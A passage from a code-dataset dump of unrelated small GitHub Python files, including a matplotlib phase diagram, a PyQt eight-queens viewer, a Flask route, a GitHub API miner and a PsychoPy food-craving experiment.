Guide\nNumPy User Guide\nRelease 1.11.0\nWritten by the NumPy community\nMay 29, 2016\n\n3.User's Guide\nMatplotlib\nRelease 2.1.0\nby John Hunter, Darren Dale, Eric Firing, Michael Droettboom and the m\nOctober 07, 2017\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nX, Y = np.meshgrid(np.arange(-20, 20, 1), np.arange(-10, 10, 1))\n#X, Y = np.meshgrid(np.arange(-10, 10, 1), np.arange(-5, 5, 1))\nomega=0.8\nbeta=1\nXdot=Y\nYdot=-(omega**2)*X-2*beta*Y\nplt.figure()\nplt.title('Phase & Directional Diagram: Linear System')\nQ=plt.quiver(X,Y,Xdot,Ydot,units='width')\nplt.show()\n","repo_name":"shahrear86/Dynamics","sub_path":"diaglinsys.py","file_name":"diaglinsys.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"19266522795","text":"import clipboard\r\nfrom PIL import ImageGrab\r\nimport pyautogui\r\nimport time\r\nimport pygame\r\nimport pytesseract\r\nimport csv\r\n\r\nim = ImageGrab.grabclipboard()\r\nnumColumns = 3 # number of iterations it will run, and cells it will create\r\npyautogui.hotkey('alt', 'tab')\r\ndata = []\r\nfor x in numColumns:\r\n pyautogui.hotkey('win' + 'shift' + 's')\r\n # -----this code has us wait for a mouse click\r\n copied = False\r\n while not copied:\r\n event = pygame.event.wait()\r\n if event.type == pygame.MOUSEBUTTONUP:\r\n im.save('tempPic.png', 'PNG')\r\n datum = (pytesseract.image_to_string(im.open('tempPic.png')))\r\n data.append(datum)\r\n time.sleep(.1)\r\n copied = True\r\nprint(data)\r\nclipboard.copy()\r\n","repo_name":"elijahnicpon/NF-Internship-Work","sub_path":"Random Python Projects/ULSucksAtScanning.py","file_name":"ULSucksAtScanning.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41974413269","text":"# auxiliary functions for the FGL-ML project\n\nimport numpy as np\nimport pandas as pd\n\ndef tform2dtype(tform):\n if tform.find('A') > -1:\n return str\n elif tform.find('E') > -1 or tform.find('D') > -1:\n if len(tform) == 1:\n return float\n else:\n return 'array'\n elif tform.find('I') > -1:\n if len(tform) == 1:\n return int\n else:\n return 'array'\n\ndef hdu2df(table, index_name=None):\n if index_name is not None:\n index = np.array(table.data.field(index_name), dtype=str)\n index = [st.strip() for st in index]\n all_keys = list(table.header.keys())\n data = {}\n for key in all_keys:\n if key.startswith('TFORM'):\n form = table.header[key]\n dtype = tform2dtype(form)\n if dtype != 'array':\n type_key = key.replace('TFORM', 'TTYPE')\n data_key = table.header[type_key]\n if data_key != index_name:\n data[data_key] = np.array(table.data.field(data_key), dtype=dtype)\n return pd.DataFrame(data=data, index=index)\n #df_fgl.index = [st.strip() for st in df_fgl.index]\n\n \ndef get_prob_class(df, algs, classes):\n res = pd.DataFrame(index=df.index)\n res['Category_Prob'] = 'MIXED'\n masks = {}\n classes_loc = [cls for cls in classes if ('%s_%s' % (cls, algs[0])) in df.columns]\n for cls in classes_loc:\n masks[cls] = 1.\n for alg in algs:\n #print(alg)\n columns = ['%s_%s' % (cls, alg) for cls in classes_loc]\n thres = np.max(df[columns], axis=1) - 1.e-5\n #print(thres)\n for cls in classes_loc:\n clm = '%s_%s' % (cls, alg)\n masks[cls] *= np.heaviside(df[clm] - thres, 0.)\n #print(cls, masks[cls])\n for cls in classes_loc:\n msk = np.array(masks[cls], dtype=bool)\n res['Category_Prob'][msk] = cls\n return res\n\ndef accuracy(true_labels, pred_labels):\n return np.sum(true_labels == pred_labels) / len(true_labels)\n\n\ndef h2cum(arr):\n res = 1. * arr[::-1]\n for i in range(1, len(arr)):\n res[i] += res[i - 1]\n return res[::-1]\n\ndef min_max_vs(dct, corr={}, keys=None):\n if keys is None:\n keys = dct.keys()\n vals = np.array([dct[key] - corr.get(key, 0.) for key in keys])\n return np.min(vals, axis=0), np.max(vals, axis=0)\n\ndef get_mean_dp_dm(pred):\n mean = np.mean(pred)\n delta_plus = np.max(pred) - mean\n delta_minus = mean - np.min(pred)\n return mean, delta_plus, delta_minus\n","repo_name":"aakashbhat/Fermi-LAT","sub_path":"py_dima/auxil_ML.py","file_name":"auxil_ML.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"37566904927","text":"import collections\nimport sys\nimport heapq\n\ninput = sys.stdin.readline\n\n\ndef inp():\n return (int(input()))\ndef inlt():\n return (list(map(int, input().split())))\ndef insr():\n s = input()\n return (list(s[:len(s) - 1]))\ndef invr():\n return (map(int, input().split()))\n\n\ndef solution():\n n, k = inlt()\n a = inlt()\n res = 0\n intervals = []\n for i in range(1, n):\n interval = abs(a[i] - a[i-1])\n intervals.append(interval)\n res += interval\n intervals.sort(reverse=True)\n for i in range(k-1):\n res -= intervals[i]\n print(res)\n return 0\n\n\nif __name__ == '__main__':\n t = inp()\n for i in range(t):\n solution()\n","repo_name":"cybsbbb/codeforces_practice","sub_path":"contests/Round882/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"19337339833","text":"#A série de Fibonacci é formada pela sequência 0,1,1,2,3,5,8,13,21,34,55,...\n#Faça um programa capaz de gerar a série até o n-ésimo termo.\n\ntermos = int(input('Quantos termos da sequência de Fibonacci quer gerar? '))\nfibonacci = 0\na = 1\nb = 1\nfibonacci = 0\nfor n in range(0, termos):\n if n == 0:\n print(a, b, end=' ')\n else:\n fibonacci = b + a\n a = b\n b = fibonacci\n print(fibonacci, end=' ')\n\n","repo_name":"prmmendes/Python-Exercicios","sub_path":"3.15_estrutura_de_repeticao.py","file_name":"3.15_estrutura_de_repeticao.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"14025208529","text":"from flask_app import app\nfrom flask import render_template,redirect,request,session,flash\nfrom flask_app.models.ninja import Ninja\nfrom flask_app.models.dojo import Dojo\n\n@app.route('/new_ninja')\ndef new_ninja():\n dojos = Dojo.get_all_dojos()\n return render_template(\"new_ninja.html\", all_dojos=dojos)\n\n@app.route('/create_ninja', methods=[\"POST\"])\ndef create_ninja():\n # First we make a data dictionary from our request.form coming from our template.\n # The keys in data need to line up exactly with the variables in our query string.\n data = {\n \"fname\": request.form[\"fname\"],\n \"lname\" : request.form[\"lname\"],\n \"age\" : request.form[\"age\"],\n \"dojo_id\" : request.form[\"dojo_id\"]\n }\n # We pass the data dictionary into the save method from the Ninja class.\n id = Ninja.insert_new_ninja(data)\n # Don't forget to redirect after saving to the database.\n return redirect('/dojos/' + data['dojo_id'])\n","repo_name":"dfried514/python2022","sub_path":"flask_mysql/crud/dojos_and_ninjas/flask_app/controllers/ninjas.py","file_name":"ninjas.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"43102828000","text":"from PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom PyQt5.QtWidgets import QSizePolicy\r\nfrom PyQt5.QtCore import Qt\r\nfrom PyQt5.QtGui import QCursor\r\n\r\ndef find_all_possibilities(lst,i):\r\n if (i>u) or (len(lst) == o) :\r\n possibilities.append(lst)\r\n return\r\n if (i not in [_[0] for _ in lst]):\r\n for myitem in range(1,u+1):\r\n if (myitem not in [_[1] for _ in lst]):\r\n if len([0 for p in lst if abs(p[0]-i) == abs(p[1]-myitem)])==0:\r\n find_all_possibilities(lst+[[i,myitem]],i+1)\r\n\r\ndef start(n,k):\r\n global possibilities , u,o\r\n u = n\r\n o = k\r\n possibilities = []\r\n find_all_possibilities([],1)\r\n return possibilities\r\n\r\nclass Pawn(QtWidgets.QWidget):\r\n def __init__(self,color):\r\n super().__init__()\r\n if color == 1:\r\n self.image = QtGui.QPixmap('bq.png')\r\n else:\r\n self.image = QtGui.QPixmap('wq.png')\r\n self.setMinimumSize(30, 30)\r\n def paintEvent(self, event):\r\n qp = QtGui.QPainter(self)\r\n size = min(self.width(), self.height())\r\n qp.drawPixmap(0, 0, self.image.scaled(\r\n size, size, QtCore.Qt.KeepAspectRatio, QtCore.Qt.SmoothTransformation))\r\n\r\nclass process(QtWidgets.QWidget):\r\n def __init__(self , brd):\r\n super().__init__()\r\n layout = QtWidgets.QGridLayout(self)\r\n layout.setSpacing(5)\r\n layout.setContentsMargins(0, 0, 0, 0)\r\n self.myboard = brd\r\n self.number_of_all_possibilities = QtWidgets.QLabel()\r\n self.number_of_all_possibilities.setAlignment(Qt.AlignCenter)\r\n self.default_color = 1\r\n self.button = QtWidgets.QPushButton('Click me')\r\n self.button.setFixedWidth(120)\r\n self.next = QtWidgets.QPushButton('Next')\r\n self.next.setFixedWidth(120)\r\n self.previous = QtWidgets.QPushButton('Previous')\r\n self.black_mode = QtWidgets.QRadioButton()\r\n self.white_mode = QtWidgets.QRadioButton()\r\n self.black_mode.setChecked(True)\r\n self.black_mode.setText(\"Black Mode\")\r\n self.white_mode.setText(\"White Mode\")\r\n self.black_mode.toggled.connect(self.black_selected)\r\n self.white_mode.toggled.connect(self.white_selected)\r\n self.previous.setFixedWidth(120)\r\n self.previous.setEnabled(False)\r\n self.next.setEnabled(False)\r\n self.lst = None\r\n self.button.clicked.connect(lambda: self.draw_queens(8))\r\n self.button.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\r\n self.next.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\r\n self.previous.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\r\n self.black_mode.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\r\n self.white_mode.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\r\n self.next.clicked.connect(self.next_draw)\r\n self.previous.clicked.connect(self.previous_draw)\r\n layout.addWidget(self.number_of_all_possibilities)\r\n layout.addWidget(self.black_mode)\r\n layout.addWidget(self.white_mode)\r\n layout.addWidget(self.button)\r\n layout.addWidget(self.previous)\r\n layout.addWidget(self.next)\r\n def black_selected(self,selected):\r\n if selected:\r\n self.default_color = 1\r\n if self.lst != None:\r\n self.myboard.clear_widgets()\r\n self.myboard.drawing(self.lst[default_index],self.default_color)\r\n\r\n def white_selected(self,selected):\r\n if selected:\r\n self.default_color = 0\r\n if self.lst != None:\r\n self.myboard.clear_widgets()\r\n self.myboard.drawing(self.lst[default_index],self.default_color)\r\n\r\n def next_draw(self):\r\n global default_index\r\n default_index += 1\r\n self.myboard.clear_widgets()\r\n self.previous.setEnabled(True)\r\n if default_index == len(self.lst)-1:\r\n self.next.setEnabled(False)\r\n self.myboard.drawing(self.lst[default_index],self.default_color)\r\n def previous_draw(self):\r\n global default_index\r\n default_index -= 1\r\n self.myboard.clear_widgets()\r\n self.next.setEnabled(True)\r\n if default_index == 0:\r\n self.previous.setEnabled(False)\r\n self.myboard.drawing(self.lst[default_index],self.default_color)\r\n def draw_queens(self,t):\r\n global default_index\r\n self.lst = start(8,t)\r\n self.next.setEnabled(True)\r\n self.number_of_all_possibilities.setText(\"ALL : \"+str(len(self.lst)))\r\n self.number_of_all_possibilities.adjustSize()\r\n self.myboard.drawing(self.lst[default_index],self.default_color)\r\n self.button.setEnabled(False)\r\n\r\nclass Board(QtWidgets.QWidget):\r\n def __init__(self):\r\n super().__init__()\r\n layout = QtWidgets.QGridLayout(self)\r\n layout.setSpacing(0)\r\n layout.setContentsMargins(0, 0, 0, 0)\r\n self.background = QtGui.QPixmap('photo.jpg')\r\n self.mylayout = layout\r\n \r\n def clear_widgets(self):\r\n for i in reversed(range(self.mylayout.count())): \r\n self.mylayout.itemAt(i).widget().setParent(None)\r\n\r\n def drawing(self,l,c):\r\n for item in l:\r\n self.mylayout.addWidget(Pawn(c), item[0]-1, item[1]-1)\r\n\r\n def minimumSizeHint(self):\r\n return QtCore.QSize(500, 500)\r\n\r\n def sizesHint(self):\r\n return QtCore.QSize(1000, 1000)\r\n\r\n def resizeEvent(self, event):\r\n size = min(self.width(), self.height())\r\n rect = QtCore.QRect(0, 0, size, size)\r\n rect.moveCenter(self.rect().center())\r\n self.layout().setGeometry(rect)\r\n\r\n def paintEvent(self, event):\r\n qp = QtGui.QPainter(self)\r\n rect = self.layout().geometry()\r\n qp.drawPixmap(rect, self.background.scaled(rect.size(), \r\n QtCore.Qt.KeepAspectRatio, QtCore.Qt.SmoothTransformation))\r\n \r\n\r\nclass ChessGame(QtWidgets.QMainWindow):\r\n def __init__(self):\r\n super().__init__()\r\n self.setWindowTitle('Chess Game')\r\n central = QtWidgets.QWidget()\r\n self.setCentralWidget(central)\r\n layout = QtWidgets.QVBoxLayout(central)\r\n layout.setSpacing(10)\r\n layout.setAlignment(Qt.AlignCenter)\r\n self.board = Board()\r\n layout.addWidget(self.board)\r\n self.process = process(self.board)\r\n layout.addWidget(self.process)\r\n\r\nimport sys\r\ndefault_index = 0\r\napp = QtWidgets.QApplication(sys.argv)\r\ngame = ChessGame()\r\ngame.show()\r\nsys.exit(app.exec_())","repo_name":"paranism0/8queens","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":6467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"6086173704","text":"import datetime\nimport json\nimport os\nfrom time import sleep\n\nimport pandas as pd\nimport requests\n\nBASE_PATH = os.path.dirname(os.path.dirname(__file__))\ndata_path = os.path.join(BASE_PATH, 'data')\n\n\nclass GitMiner:\n def __init__(self):\n self.base_url = 'https://api.github.com'\n with open(os.path.join(BASE_PATH, 'conf', 'auth.conf'), 'r') as file:\n lines = file.readlines()\n self.token = lines[2].split('\\n')[0]\n self.session = requests.Session()\n self.headers = {'Authorization': 'token ' + self.token,\n 'content-type': 'application/json'}\n self.popular_repos = []\n\n def get_popular_repos(self):\n self.headers['accept'] = 'application/vnd.github.cloak-preview'\n api = '/search/repositories?q=stars:>1&sort=stars'\n response = self.session.get(self.base_url + api, headers=self.headers)\n results = json.loads(response.text)\n # results['items'][0]['full_name']\n print()\n\n def get_projects_with_coc(self):\n self.headers['accept'] = 'application/vnd.github.v3+json'\n # repos that contain a code of conduct in their root directory\n api = '/search/code?q=filename:code_of_conduct+path%3A%2F&sort=indexed&order=asc&per_page=100&page='\n repo, path = [], []\n for i in range(1, 11): # only first 1000 results\n response = self.session.get(self.base_url+api+str(i), headers=self.headers)\n results = json.loads(response.text)\n while True:\n try:\n repo += [item['repository']['full_name'] for item in results['items']]\n path += [item['path'] for item in results['items']]\n break\n except KeyError: # rate limit\n sleep(90)\n pass\n sleep(30)\n return repo, path\n\n def get_project_features(self, projects):\n self.headers['accept'] = 'application/vnd.github.v3+json'\n api = '/repos/'\n last_date = datetime.datetime(2021, 6, 8).timestamp()\n stars, age, size = [], [], []\n for p in projects:\n response = self.session.get(self.base_url + api + p, headers=self.headers, verify=False)\n results = json.loads(response.text)\n stars.append(results['stargazers_count'])\n size.append(results['size'])\n created_at = datetime.datetime.strptime(results['created_at'], '%Y-%m-%dT%H:%M:%SZ').timestamp()\n age.append(int(last_date - created_at))\n\n pd.DataFrame({'repository_url': projects, 'star': stars, 'size': size, 'age': age})\\\n .to_csv('repo_info.csv', index=False)\n\n\nif __name__ == '__main__':\n miner = GitMiner()\n projects = pd.read_csv(os.path.join(data_path, 'All_Pulls.csv'))['repository_url'].unique().tolist()\n miner.get_project_features(projects)\n # repo, path = miner.get_projects_with_coc()\n # df = pd.DataFrame({'repo': repo, 'path': path})\n # df.to_csv(os.path.join(data_path, 'coc_repos.csv'), index=False)\n # from os import listdir\n # from os.path import isfile, join\n # mypath = os.path.join(data_path, 'prs')\n # onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]\n # print(onlyfiles)\n # pr_size = []\n # for i in onlyfiles:\n # df = pd.read_csv(os.path.join(mypath, i))\n # pr_size.append(len(df))\n # onlyfiles = [i.split('_')[0] for i in onlyfiles]\n # df = pd.DataFrame({'project': onlyfiles, 'n_pr': pr_size})\n # df.to_csv(os.path.join(mypath, 'stats.csv'))\n","repo_name":"hosseinkshvrz/coc","sub_path":"src/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":3587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"34581690879","text":"#Food Craving\nfrom __future__ import absolute_import, division\nfrom psychopy import locale_setup, sound, gui, visual, core, data, event, logging, clock\nfrom psychopy.constants import (NOT_STARTED, STARTED, PLAYING, PAUSED,\n STOPPED, FINISHED, PRESSED, RELEASED, FOREVER)\nimport os\nimport csv\nimport sys\n\n_thisDir = os.path.dirname(os.path.abspath(__file__))\nos.chdir(_thisDir)\n\npsychopyVersion = '3.0.7'\nexpName = 'FoodCraving'\nexpInfo = {'participant': '', 'session': '001'}\ndlg = gui.DlgFromDict(dictionary=expInfo, title=expName)\nif dlg.OK == False:\n core.quit()\nexpInfo['date'] = data.getDateStr()\nexpInfo['expName'] = expName\nexpInfo['psychopyVersion'] = psychopyVersion\n\nfilename = _thisDir + os.sep + u'data/%s_%s_%s' % (expInfo['participant'], expName, expInfo['date'])\n\nthisExp = data.ExperimentHandler(name=expName, version='',\n extraInfo=expInfo, runtimeInfo=None,\n originPath='C:\\\\Users\\\\Jojo\\\\Downloads\\\\Helion Lab\\\\Experiment Files\\\\Food Regulation\\\\FoodCraving.py',\n savePickle=True, saveWideText=True,\n dataFileName=filename)\nlogFile = logging.LogFile(filename+'.log', level=logging.EXP)\nlogging.console.setLevel(logging.WARNING)\n\nendExpNow = False\n\nwin = visual.Window(size=(1024, 768), fullscr=True, screen=0,allowGUI=True, allowStencil=False,\n monitor='testMonitor', color=[0,0,0], colorSpace='rgb',blendMode='avg', useFBO=True, units='height')\n\nexpInfo['frameRate'] = win.getActualFrameRate()\nif expInfo['frameRate'] != None:\n frameDur = 1.0 / round(expInfo['frameRate'])\nelse:\n frameDur = 1.0 / 60.0 \n\nglobalClock = core.Clock()\nroutineTimer = core.CountdownTimer()\n\n#set up components\nintroClock=core.Clock()\nInstText = visual.TextStim(win=win, text='In this part of the study you will be given a regulation strategy to use while viewing pictures of food.\\n\\nThen you will use a rating scale to ' +\n 'indicate how much you are craving the food item.\\n\\nWhen you are ready, press space to start!', color='white', pos=(0,0), height=0.07, wrapWidth=1.3)\nTYClock = core.Clock()\nendText = visual.TextStim(win=win, text='Thank you for participating!\\n\\nYou have completed this part of the study.', font='Arial', pos=(0, 0), height=0.1, wrapWidth=None, color='white')\n\ncueClock=core.Clock()\ncueType= visual.TextStim(win=win, text='default', color='white', pos=(0,0), height=0.14)\nISIClock=core.Clock()\nisi = visual.TextStim(win=win, text='+', color='white', pos=(0,0), height=0.1)\nImageClock=core.Clock()\nfoodPic=visual.ImageStim(win=win, image='sin', pos=(0,0))\n\nratingsClock = core.Clock()\nquestion = visual.TextStim(win=win, text='How much are you craving this food?', font='Arial', pos=(0, 0.15), height=0.07, wrapWidth=None, color='white');\nratingScale = visual.RatingScale(win=win, marker='triangle', size=1.3, pos=[0.0, -0.4], low=1, high=7, labels=[''], scale='')\nscaleMsg1 = visual.TextStim(win=win, text='Not at all', font='Arial', pos=(-0.45, -0.13), height=0.04, color='white');\nscaleMsg2 = visual.TextStim(win=win, text='Very much', font='Arial', pos=(0.45, -0.13), height=0.04, color='white');\n\n\n#isi function\ndef isiFunc():\n t = 0\n ISIClock.reset()\n frameN = -1\n continueRoutine = True\n routineTimer.add(3.000000)\n ISIComponents = [isi]\n for thisComponent in ISIComponents:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n \n #begin isi\n while continueRoutine and routineTimer.getTime() > 0:\n t = ISIClock.getTime()\n frameN = frameN + 1\n \n if t >= 0.0 and isi.status == NOT_STARTED:\n isi.tStart = t\n isi.frameNStart = frameN\n isi.setAutoDraw(True)\n frameRemains = 0.0 + 1.0- win.monitorFramePeriod * 0.75\n if isi.status == STARTED and t >= frameRemains:\n isi.setAutoDraw(False)\n \n if endExpNow or event.getKeys(keyList=[\"escape\"]):\n core.quit()\n \n if not continueRoutine:\n break\n continueRoutine = False\n for thisComponent in ISIComponents:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break\n \n if continueRoutine:\n win.flip()\n \n #end isi\n for thisComponent in ISIComponents:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\n \n\n\n#start running the intro screen\nt = 0\nintroClock.reset()\nframeN = -1\ncontinueRoutine = True\nspace = event.BuilderKeyResponse()\nintroComponents = [InstText, space]\nfor thisComponent in introComponents:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n\nwhile continueRoutine:\n t = introClock.getTime()\n frameN = frameN + 1\n \n if t >= 0.0 and InstText.status == NOT_STARTED:\n InstText.tStart = t\n InstText.frameNStart = frameN\n InstText.setAutoDraw(True)\n \n if t >= 0.0 and space.status == NOT_STARTED:\n space.tStart = t\n space.frameNStart = frameN\n space.status = STARTED\n win.callOnFlip(space.clock.reset)\n event.clearEvents(eventType='keyboard')\n if space.status == STARTED:\n theseKeys = event.getKeys(keyList=['space'])\n \n if \"escape\" in theseKeys:\n endExpNow = True\n if len(theseKeys) > 0:\n space.keys = theseKeys[-1]\n space.rt = space.clock.getTime()\n continueRoutine = False\n \n if endExpNow or event.getKeys(keyList=[\"escape\"]):\n core.quit()\n \n if not continueRoutine:\n break\n continueRoutine = False\n for thisComponent in introComponents:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break\n \n if continueRoutine:\n win.flip()\n\nfor thisComponent in introComponents:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\nif space.keys in ['', [], None]:\n space.keys=None\nthisExp.addData('space.keys',space.keys)\nif space.keys != None:\n thisExp.addData('space.rt', space.rt)\nthisExp.nextEntry()\nroutineTimer.reset()\n\ntrials = data.TrialHandler(nReps=1, method='random', \n extraInfo=expInfo, originPath=-1,\n trialList=data.importConditions('FoodReg.csv'),\n seed=None, name='trials')\nthisExp.addLoop(trials)\nthisTrial = trials.trialList[0]\nif thisTrial != None:\n for paramName in thisTrial:\n exec('{} = thisTrial[paramName]'.format(paramName))\n\nfor thisTrial in trials:\n currentLoop = trials\n if thisTrial != None:\n for paramName in thisTrial:\n exec('{} = thisTrial[paramName]'.format(paramName))\n #regulation cue\n t = 0\n cueClock.reset()\n frameN = -1\n continueRoutine = True\n routineTimer.add(2.000000)\n cueType.setText(CueType)\n cueComponents = [cueType]\n for thisComponent in cueComponents:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n \n while continueRoutine and routineTimer.getTime() > 0:\n t = cueClock.getTime()\n frameN = frameN + 1\n \n if t >= 0.0 and cueType.status == NOT_STARTED:\n cueType.tStart = t\n cueType.frameNStart = frameN\n cueType.setAutoDraw(True)\n frameRemains = 0.0 + 2- win.monitorFramePeriod * 0.7\n if cueType.status == STARTED and t >= frameRemains:\n cueType.setAutoDraw(False)\n \n if endExpNow or event.getKeys(keyList=[\"escape\"]):\n core.quit()\n \n if not continueRoutine:\n break\n continueRoutine = False\n for thisComponent in cueComponents:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break\n \n if continueRoutine:\n win.flip()\n\n for thisComponent in cueComponents:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\n \n #food pics\n t = 0\n ImageClock.reset() \n frameN = -1\n continueRoutine = True\n routineTimer.add(8.000000)\n foodPic.setImage(Picture)\n ImageComponents = [foodPic]\n for thisComponent in ImageComponents:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n \n while continueRoutine and routineTimer.getTime() > 0:\n t = ImageClock.getTime()\n frameN = frameN + 1\n \n if t >= 0.0 and foodPic.status == NOT_STARTED:\n foodPic.tStart = t\n foodPic.frameNStart = frameN\n foodPic.setAutoDraw(True)\n frameRemains = 0.0 + 8- win.monitorFramePeriod * 0.75\n if foodPic.status == STARTED and t >= frameRemains:\n foodPic.setAutoDraw(False)\n \n if endExpNow or event.getKeys(keyList=[\"escape\"]):\n core.quit()\n \n if not continueRoutine:\n break\n continueRoutine = False\n for thisComponent in ImageComponents:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break\n \n if continueRoutine:\n win.flip()\n \n for thisComponent in ImageComponents:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\n \n isiFunc()\n \n #ratings\n t = 0\n ratingsClock.reset()\n frameN = -1\n continueRoutine = True\n routineTimer.add(5.000000)\n question.setText('How much are you craving this food?')\n ratingScale.reset()\n scaleMsg1.setText('Not at all')\n scaleMsg2.setText('Very Much')\n ratingsComponents = [question, ratingScale, scaleMsg1, scaleMsg2]\n for thisComponent in ratingsComponents:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n \n while continueRoutine and routineTimer.getTime() > 0:\n t = ratingsClock.getTime()\n frameN = frameN + 1\n \n if t >= 0.0 and question.status == NOT_STARTED:\n question.tStart = t\n question.frameNStart = frameN\n question.setAutoDraw(True)\n frameRemains = 0.0 + 5- win.monitorFramePeriod * 0.75\n if question.status == STARTED and t >= frameRemains:\n question.setAutoDraw(False)\n if t >= 0.0 and ratingScale.status == NOT_STARTED:\n ratingScale.tStart = t\n ratingScale.frameNStart = frameN\n ratingScale.setAutoDraw(True)\n continueRoutine &= ratingScale.noResponse\n frameRemains = 0.0 + 5- win.monitorFramePeriod * 0.75\n if ratingScale.status == STARTED and t >= frameRemains:\n ratingScale.setAutoDraw(False)\n \n if t >= 0.0 and scaleMsg1.status == NOT_STARTED:\n scaleMsg1.tStart = t\n scaleMsg1.frameNStart = frameN\n scaleMsg1.setAutoDraw(True)\n frameRemains = 0.0 + 5- win.monitorFramePeriod * 0.75\n if scaleMsg1.status == STARTED and t >= frameRemains:\n scaleMsg1.setAutoDraw(False)\n \n if t >= 0.0 and scaleMsg2.status == NOT_STARTED:\n scaleMsg2.tStart = t\n scaleMsg2.frameNStart = frameN\n scaleMsg2.setAutoDraw(True)\n frameRemains = 0.0 + 5- win.monitorFramePeriod * 0.75\n if scaleMsg2.status == STARTED and t >= frameRemains:\n scaleMsg2.setAutoDraw(False)\n \n if endExpNow or event.getKeys(keyList=[\"escape\"]):\n core.quit()\n \n if not continueRoutine:\n break\n continueRoutine = False\n for thisComponent in ratingsComponents:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break\n \n if continueRoutine:\n win.flip()\n \n for thisComponent in ratingsComponents:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\n trials.addData('ratingScale.response', ratingScale.getRating())\n trials.addData('ratingScale.rt', ratingScale.getRT())\n \n isiFunc()\n\n#endText\nt= 0\nTYClock.reset()\nframeN = -1\ncontinueRoutine = True\nTYComponents = [endText]\nfor thisComponent in TYComponents:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n\nwhile continueRoutine:\n t = TYClock.getTime()\n frameN = frameN + 1\n \n if t >= 0.0 and endText.status == NOT_STARTED:\n endText.tStart = t\n endText.frameNStart = frameN\n endText.setAutoDraw(True)\n \n if endExpNow or event.getKeys(keyList=[\"escape\"]):\n core.quit()\n \n if not continueRoutine:\n break\n continueRoutine = False\n for thisComponent in TYComponents:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break\n \n if continueRoutine:\n win.flip()\n\nfor thisComponent in TYComponents:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\nroutineTimer.reset()\nthisExp.saveAsWideText(filename+'.csv')\nthisExp.saveAsPickle(filename)\nlogging.flush()\nthisExp.abort()\nwin.close()\ncore.quit()\n\n","repo_name":"social-and-affective-neuroscience-lab/Self-Regulation-Psychopy-Files","sub_path":"FoodRegulation/FoodCraving.py","file_name":"FoodCraving.py","file_ext":"py","file_size_in_byte":13303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32299570035","text":"\nfrom movie_page_parser import parseMoviePageHTML\n\nclass CorpusParser:\n\n FILE_NAMES = []\n STOP_FILE = \"stop.txt\"\n STOP_WORDS = []\n DOC_MAPS = []\n MASTER_MAP = {}\n TERMS = []\n\n def __init__(self, fileNames):\n self.FILE_NAMES = fileNames\n self.readStopWords()\n self.readWords()\n self.sortTerms()\n\n def readStopWords(self):\n with open(self.STOP_FILE) as file:\n for line in file:\n for word in line.split():\n self.STOP_WORDS.append(word)\n \n def readWords(self):\n for fileName in self.FILE_NAMES:\n docMap = {}\n with open(fileName) as file:\n text = parseMoviePageHTML(file.read())\n for word in text.split():\n word = word.lower()\n if word in docMap:\n docMap[word] += 1\n else:\n docMap[word] = 1\n if word in self.MASTER_MAP:\n self.MASTER_MAP[word] += 1\n else:\n self.MASTER_MAP[word] = 1\n \n for stopWord in self.STOP_WORDS:\n docMap.pop(stopWord, None)\n self.MASTER_MAP.pop(stopWord, None)\n \n self.DOC_MAPS.append(docMap)\n\n def sortTerms(self):\n for [itemKey, itemValue] in self.MASTER_MAP.items():\n docFrequency = 0\n for i in range(len(self.FILE_NAMES)):\n if itemKey in self.DOC_MAPS[i]:\n docFrequency += 1\n self.TERMS.append(Word(itemKey, itemValue, docFrequency))\n\n 